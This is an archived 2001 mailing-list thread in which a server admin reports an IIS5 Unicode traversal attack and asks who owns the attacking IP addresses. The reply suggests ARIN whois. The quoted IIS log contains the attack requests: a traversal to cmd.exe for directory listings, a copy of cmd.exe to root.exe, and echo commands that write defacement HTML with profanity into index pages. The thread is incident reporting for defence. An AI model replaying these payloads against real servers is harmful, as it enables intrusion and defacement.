Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Security Incidents: RE: who's owning this ip?

RE: who's owning this ip?

From: Matt Rowley <matt.rowley_at_streampipe.com>
Date: Mon, 14 May 2001 13:26:17 -0400

http://www.arin.net/cgi-bin/whois.pl
to reverse lookup the ip for the coordinator.

--Matt

> -----Original Message-----
> From: Incidents Mailing List [mailto:INCIDENTS_at_SECURITYFOCUS.COM]On
> Behalf Of Thomas Springer
> Sent: Tuesday, May 08, 2001 12:08 PM
> To: INCIDENTS_at_SECURITYFOCUS.COM
> Subject: who's owning this ip?
>
>
> We had an attacker exploiting unicode on iis5 yesterday - see funny
> chinese-war-pages in the log below. The hacker successfully exploited
> IIS-Unicode bug, created ~100 files but was still too dumb to deface the
> webserver.
>
> The attacker used 208.22.161.15 and 202.97.205.3.
> I tried a trace but ended up with
> ...
> 19 210 ms 211 ms 220 ms pao1-sjc2-oc48-2.pao1.above.net [
> 20 210 ms 231 ms 230 ms 208.184.129.244.cmnetcom.com.hk [
> 21 200 ms 211 ms 220 ms 202.0.170.34
> 22 361 ms 370 ms 411 ms 202.0.170.13
> 23 370 ms 391 ms 400 ms 202.97.10.193
> 24 521 ms 541 ms 551 ms 202.97.10.66
> 25 581 ms 601 ms 581 ms 61.138.38.2
> 26 721 ms 711 ms 671 ms 61.180.139.202
> 27 341 ms 350 ms 351 ms 202.97.205.3
>
> 208.22.161.15 seems to end at
> 17 130 ms 130 ms 131 ms ewr-core-02.inet.qwest.net
> [205.171.17.130]
> 18 110 ms 110 ms 111 ms ewr-brdr-01.inet.qwest.net
> [205.171.17.82]
> 19 * * * Timeout..
> ....
>
> Any chances to find out, to whom the two ip-adresses belong?
> Any tool that copies cmd.exe to root.exe?
>
> I liked this hack, because nothing happend and people her
> suddenly develop
> security-awareness. hence, even the servers i begged to secure for weeks
> are patched now.
> BTW it's a german website - nothing to do with an
> chinese-american spy-wars.
>
> funny hackerworld...
>
> thomas
>
> --- IIS-Logsnip ---
> 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
> /scripts/../../winnt/system32/cmd.exe /c+dir 200 664 66 - - -
> 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
> /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 856 70 - - -
> 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
> /scripts/../../winnt/system32/cmd.exe
> /c+copy+\winnt\system32\cmd.exe+root.exe 502 382 100 - - -
> 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe
> /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>
> ^<br^>^<br^>
> ^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+siz
> e%3D7+color%
> 3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22ce
> nter%22^>^<f
> ont+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D
> %22center%22
> ^>^<font+size%3D4+color%3Dred^>contact:sysadmcn_at_yahoo.com.cn^</h
> tml^>>.././i
> ndex.asp 502 355 423 - - -
> 2001-05-07 12:28:55 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe
> /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>
> ^<br^>^<br^>
> ^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+siz
> e%3D7+color%
> 3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22ce
> nter%22^>^<f
> ont+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D
> %22center%22
> ^>^<font+size%3D4+color%3Dred^>contact:sysadmcn_at_yahoo.com.cn^</h
> tml^>>.././i
> ndex.htm 502 355 423 - - -
>
>
> Thomas Springer
Received on May 14 2001

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos